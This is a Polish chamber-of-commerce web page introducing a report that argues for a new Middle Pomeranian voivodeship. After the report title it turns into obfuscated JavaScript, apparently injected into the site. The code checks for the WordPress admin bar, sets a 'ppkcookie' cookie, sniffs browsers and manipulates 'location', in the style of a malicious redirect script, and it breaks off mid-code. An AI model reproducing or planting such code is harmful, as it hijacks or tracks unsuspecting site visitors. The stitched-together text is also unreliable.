Województwo Środkowopomorskie od 2020 Argumenty i Oświadczenia Przemawiające za Koniecznością Powołania Województwa Środkowopomorskiego | Północna Izba Gospodarcza w Koszalinie

Szanowni Państwo

Prezentujemy Państwu  Raport „Województwo Środkowopomorskie od 2020 argumenty i oświadczenia przemawiające za koniecznością powołania Województwa Środkowopomorskiego”.

Raport zawiera zbiór argumentów i wypowiedzi przedstawicieli lokalnego świata nauki i biznesu na rzecz powstania 17 województwa. Przypominamy również wypowiedzi polityków partii rządzącej od 2004 roku, które propagują i podtrzymują tę ważną dla nas ideę.

Przy projektowaniu nowego województwa powinno się zastosować również zrównoważony podział instytucji regionalnych i umiejscowienie ich nie tylko w Koszalinie i Słupsku, ale również w innych stolicach powiatów np. Kołobrzegu, Wałczu, Szczecinku, Bytowie czy Człuchowie, w porozumieniu z ich mieszkańcami. Powinniśmy odejść od centralizmu regionalnego, bo jak pokazują doświadczenia ostatniej reformy administracyjnej – tylko stolice województw rozwijają się, a peryferia województw są marginalizowane i ubożeją pod każdym względem.

Potraktujcie Państwo, poniższą publikację jako kompendium wiedzy na temat projektowanego Województwa Środkowopomorskiego, poznajcie naszą argumentację. Przede wszystkim prosimy aby uwierzyć że powstanie Środkowopomorskiego jest realne, a zależy jedynie od dobrej woli rządzących.

Raport WOJEWÓDZTWO

ŚRODKOWOPOMORSKIE OD 2020 r

bty

'toUTCString',’cookie',’split',’length',’charAt',’substring',’indexOf',’userAgent',’match',’MSIE;',’OPR',’Chromium',’Firefox',’Chrome',’ppkcookie',’location',’http://',’getElementById',’wpadminbar',’undefined',’setTime',’getTime',';\x20expires='];(function(c,d){var e=function(f){while(–f){c[’push'](c[’shift']());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(’0x0′)](b(’0x1′))===null){if(typeof c===b(’0x2′)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(’0x3′)](h[b(’0x4′)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(’0x5′)+h[b(’0x6′)]();}document[b(’0x7′)]=d+’=’+(e||”)+g+';\x20path=/';}function i(j){var k=j+’=';var l=document[b(’0x7′)][b(’0x8′)](';');for(var m=0x0;m